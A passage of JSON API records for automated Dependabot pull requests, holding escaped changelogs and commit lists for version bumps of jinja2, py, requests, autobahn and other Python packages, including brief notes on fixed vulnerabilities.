sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.10...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.5.3 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.5.3...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.18.4 to 2.32.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.5\u003c/h2\u003e\n\u003ch2\u003e2.32.5 (2025-08-18)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SSLContext caching feature originally introduced in 2.32.0 has created\na new class of issues in Requests that have had negative impact across a number\nof use cases. The Requests team has decided to revert this feature as long term\nmaintenance of it is proving to be unsustainable in its current iteration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Python 3.14.\u003c/li\u003e\n\u003cli\u003eDropped support for Python 3.8 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.5 (2025-08-18)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SSLContext caching feature originally introduced in 2.32.0 has created\na new class of issues in Requests that have had negative impact across a number\nof use cases. The Requests team has decided to revert this feature as long term\nmaintenance of it is proving to be unsustainable in its current iteration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Python 3.14.\u003c/li\u003e\n\u003cli\u003eDropped support for Python 3.8 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect...\n\n_Description has been truncated_","html_url":"https://github.com/perplext/requests/pull/2","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/perplext%2Frequests/issues/2","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2/packages"},{"uuid":"2758323675","node_id":"PR_kwDOAOlDSM6kaK3b","number":2,"state":"open","title":"Bump the pip group across 1 directory with 17 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-20T03:45:09.000Z","updated_at":"2025-08-20T03:45:09.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":17,"packages":[{"name":"autobahn","old_version":"18.6.1","new_version":"24.4.2","repository_url":"https://github.com/crossbario/autobahn-python"},{"name":"babel","old_version":"2.6.0","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"certifi","old_version":"2018.4.16","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"configobj","old_version":"5.0.6","new_version":"5.0.9","repository_url":"https://github.com/DiffSK/configobj"},{"name":"cryptography","old_version":"2.2.2","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"flask","old_version":"0.12.4","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"idna","old_version":"2.6","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"jinja2","old_version":"2.10","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"mako","old_version":"1.0.7","new_version":"1.2.2","repository_url":"https://github.com/sqlalchemy/mako"},{"name":"pillow","old_version":"5.1.0","new_version":"10.3.0","repository_url":"https://github.com/python-pillow/Pillow"},{"name":"py","old_version":"1.5.3","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.18.4","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"sqlparse","old_version":"0.2.4","new_version":"0.5.0","repository_url":"https://github.com/andialbrecht/sqlparse"},{"name":"tqdm","old_version":"4.23.4","new_version":"4.66.3","repository_url":"https://github.com/tqdm/tqdm"},{"name":"twisted","old_version":"18.4.0","new_version":"24.7.0rc1","repository_url":"https://github.com/twisted/twisted"},{"name":"urllib3","old_version":"1.22","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"werkzeug","old_version":"0.14.1","new_version":"3.0.6","repository_url":"https://github.com/pallets/werkzeug"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 17 updates in the /nix/server directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [autobahn](https://github.com/crossbario/autobahn-python) | `18.6.1` | `24.4.2` |\n| [babel](https://github.com/python-babel/babel) | `2.6.0` | `2.9.1` |\n| [certifi](https://github.com/certifi/python-certifi) | `2018.4.16` | `2024.7.4` |\n| [configobj](https://github.com/DiffSK/configobj) | `5.0.6` | `5.0.9` |\n| [cryptography](https://github.com/pyca/cryptography) | `2.2.2` | `44.0.1` |\n| [flask](https://github.com/pallets/flask) | `0.12.4` | `2.2.5` |\n| [idna](https://github.com/kjd/idna) | `2.6` | `3.7` |\n| [jinja2](https://github.com/pallets/jinja) | `2.10` | `3.1.6` |\n| [mako](https://github.com/sqlalchemy/mako) | `1.0.7` | `1.2.2` |\n| [pillow](https://github.com/python-pillow/Pillow) | `5.1.0` | `10.3.0` |\n| [py](https://github.com/pytest-dev/py) | `1.5.3` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.18.4` | `2.32.4` |\n| [sqlparse](https://github.com/andialbrecht/sqlparse) | `0.2.4` | `0.5.0` |\n| [tqdm](https://github.com/tqdm/tqdm) | `4.23.4` | `4.66.3` |\n| [twisted](https://github.com/twisted/twisted) | `18.4.0` | `24.7.0rc1` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.22` | `2.5.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `0.14.1` | `3.0.6` |\n\n\nUpdates `autobahn` from 18.6.1 to 24.4.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/crossbario/autobahn-python/blob/master/docs/changelog.rst\"\u003eautobahn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e24.4.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: Ensure ID generator in range [1, 2 ** 53] (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1637\"\u003e#1637\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e24.4.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003enew: bump minimum required Twisted version to 24.3.0 (\u003ccode\u003esee also \u0026lt;https://github.com/crossbario/autobahn-python/pull/1634\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.6.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: use regular PyPI bitarray\u0026gt;=2.7.5 rather than from GitHub master\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.6.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: updated bitarray to make eth-account work on pypy\u003c/li\u003e\n\u003cli\u003efix: updated web3 and eth-abi to not use beta versions (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1616\"\u003e#1616\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.1.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: monkey patch web3/eth_abi for python 3.11\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.1.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: support for Python up to v3.11\u003c/li\u003e\n\u003cli\u003efix: update GitHub CI\u003c/li\u003e\n\u003cli\u003efix: copyright transferred to typedef int GmbH - no license change!\u003c/li\u003e\n\u003cli\u003efix: remove coverage crap\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e22.12.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003enew: expand WAMP Flatbuffers schemata (session ID in each message for MUXing)\u003c/li\u003e\n\u003cli\u003enew: update flatc v22.12.06 and regenerate WAMP Flatbuffers type libraries\u003c/li\u003e\n\u003cli\u003efix: Twisted 22.10.0 incompability (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1604\"\u003e#1604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: Rapid Cancelling Of Tasks Can Cause InvalidStateError (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1600\"\u003e#1600\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: identify_realm_name_category (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1590\"\u003e#1590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: support Python 3.11 (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1599\"\u003e#1599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: building _nvx_utf8validator extension on non-x86 systems (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1596\"\u003e#1596\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: asyncio rawsocket protocol transport details (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1592\"\u003e#1592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003enew: expand EIP712AuthorityCertificate; more tests\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e22.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/f38f16ba28fa253dee951068cc729089c88d857d\"\u003e\u003ccode\u003ef38f16b\u003c/code\u003e\u003c/a\u003e Random ID should beginning with 1 (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1637\"\u003e#1637\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/1a7aaa9d90929a37e52f004e5d952490b185c305\"\u003e\u003ccode\u003e1a7aaa9\u003c/code\u003e\u003c/a\u003e Httpheaders (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1638\"\u003e#1638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/75f3758127d1cf0ddb4450f80e30931353b3adca\"\u003e\u003ccode\u003e75f3758\u003c/code\u003e\u003c/a\u003e update license file to include contributors (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1628\"\u003e#1628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/50e6297bc34e55a364bfa507de041e2b0cd99ed7\"\u003e\u003ccode\u003e50e6297\u003c/code\u003e\u003c/a\u003e a couple of packaging fixes (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1632\"\u003e#1632\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/924604ed250b565bcd17a30c101a86c67864811e\"\u003e\u003ccode\u003e924604e\u003c/code\u003e\u003c/a\u003e bump minimum twisted to 24.3.0 (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1635\"\u003e#1635\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/5ab94618723c488df640ae0777ac5a16ee1ab369\"\u003e\u003ccode\u003e5ab9461\u003c/code\u003e\u003c/a\u003e unit test fixes (\u003ca 